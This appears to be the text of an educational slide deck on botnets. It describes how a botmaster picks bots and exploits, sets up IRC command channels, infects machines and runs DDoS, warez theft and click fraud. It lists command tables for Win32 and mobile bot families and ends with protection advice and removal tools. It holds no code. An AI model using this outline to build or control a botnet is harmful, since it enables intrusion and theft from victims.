  • 12. BOT + EXPLOIT SELECTION Botnets typically begin when Botmaster downloads a bot program and exploit code. Bot programs such as AgoBot, IRCBot, etc are freely available on the internet. Exploits for Windows OS are generally selected. These exploits are attractive both due to large number of exploits available and the widespread adoption of Windows amongst business + residential users. © AR AG AS
  • 13. CONTROL CHANNEL After selecting the bot + exploit combination, the Botmaster must now setup one or more control channels. The most common technique is to use public IRC servers to control the botnet. The Botmaster needs a control channel in order to issue commands to and receive feedback from the botnet. Control channels are frequently moved to avoid detection. © AR AG AS
  • 14. INITIAL INFECTION The Botmaster must now begin to build the zombie army that will include the botnet. Using the chosen exploit, the Botmaster cracks and takes control over a handful of systems. © AR AG AS
  • 15. C + C MECHANISM COMMAND AND CONTROL MECHANISM A collection of computers is useless without some control mechanism. The command and control constitutes the interface between the botnet and the botmaster. The botmaster commands the c&c. The c&c commands the bots. © AR AG AS
  • 18. DOSNET A type of botnet & mostly used as a term for malicious botnets. DoSnets are used for DDoS attacks which can be very devastating. Well-known DoSnet software includes → TFN2k → Stacheldraht → Trinoo. © AR AG AS
  • 19. DOSBOT The denial of service bot is the client which is used to connect to the network. It’s also the software which performs any attacks. The vast majority of the bots are written in the → C → C++ → Java © AR AG AS
  • 20. WAREZ Botnets can be used to steal, store, or propagate warez. Warez constitutes any illegally obtained or pirated software. Bots can search hard drives for software and licenses installed on a victims machine. Botmasters can easily transfer it off for duplication and distribution. © AR AG AS
  • 21. CONTROLLING BOTNET Command Function .capture. Generates and saves an image or video file. .download. Downloads a file from a specified URL to the victim’s computer. .find file. Finds files on the victim’s computer by name and returns the paths of any files found. .getcdkeys. Returns product keys for software installed on the victim’s computer. .key log. Logs the victim’s keystrokes and saves them to a file. .open. Opens a program, an image, or a URL in a web browser. .procs. Lists the processes running on the victim’s computer. Some of the Botnet Commands from Win32 bot family: © AR AG AS
  • 22. HOW BOTS WORK? Bots creep into a person’s computer in many ways. Bots often spread themselves across the internet by looking for vulnerable, unprotected computers to infect.  When they find an exposed computer, they quickly infect the machine and then report back to their master. Their goal is then to stay hidden until they are instructed to carry out a task. © AR AG AS
  • 23. AUTOMATED TASKS BY BOTS Sending Stealing Denial of Service Click fraud They send → Spam → Viruses → Spyware They steal personal and private information and communicate it back to the malicious user: → Bank credentials → Credit card numbers → Sensitive informations Launching denial of service (DoS) attacks against a specified target. Fraudsters use bots to boost web advertising billings by automatically clicking on internet ads. © AR AG AS
  • 24. PROTECT AGAINST BOTS Limit your user rights when online. Install top-rated security software. Increase the security settings on your browser. Update automatically to latest system patches. Configure your software's settings to update automatically. Never click on attachments unless you can verify the source. © AR AG AS
  • 25. DETECTION + REMOVAL 1 RUBOTTED 2.0 BETA Monitors our computer for potential infection and suspicious activities associated with bots. Protect our system by continuously monitoring our computer for potential infection and suspicious activities with Rubotted. →downloadcenter.trendmicro.com © AR AG AS
  • 26. DETECTION + REMOVAL 2 MALICIOUS SOFTWARE REMOVAL TOOL Checks our computer for infection by specific, prevalent malicious software and removes the infection if it is found. Microsoft releases an updated version of this tool on the second Tuesday of each month. →microsoft.com © AR AG AS
  • 27. DETECTION + REMOVAL 3 NORTON™ POWER ERASER Eliminates deeply embedded and difficult to remove crimeware that traditional virus scanning doesn't always detect. Norton Power Eraser is specially designed to aggressively target scamware. →security.symantec.com © AR AG AS
  • 28. MOBILE BOTNETS Targets smartphones, attempting to gain complete access to the device and its contents as well as providing control to the botmaster. Mobile botnets give admin rights of the compromised mobile devices, enabling hackers to →Send e-mail or text messages → Make phone calls → Access contacts and photos, and more. © AR AG AS
  • 29. EXAMPLES OF MOBILE BOTNETS The Dreamdroid malware that compromised the Android devices. The iPhone SMS attack that affected iPhone + iPad devices. The Commwarrior affected Symbian series mobile devices. The Zitmo that targeted Blackberry users. © AR AG AS
  • 30. CONTROLLING MOBILE BOTNET Command Function Add Phone Number(s) Adds numbers to the forwarding list. Commands are forwarded to all bots on the list. Set sleep interval Sets how long the client waits before searching the P2P network for a command. Execute shell sequence Run a command in the shell. Download URL Downloads a command file from the botmasters. Some of the Botnet Commands from iBot family: © AR AG AS
  • 31. PROTECT AGAINST MOBILE BOTS Install the latest official OS for your smartphone. Avoid pirated apps or apps from untrusted sources. Download apps only from trusted and reputable app stores. © AR AG AS
  • 32. DETECTION + REMOVAL BULLGUARD MOBILE SECURITY 10 Detects and removes malware. Monitor information that is being sent and received. Remotely manage and monitor the smartphone. →bullguard.com © AR AG AS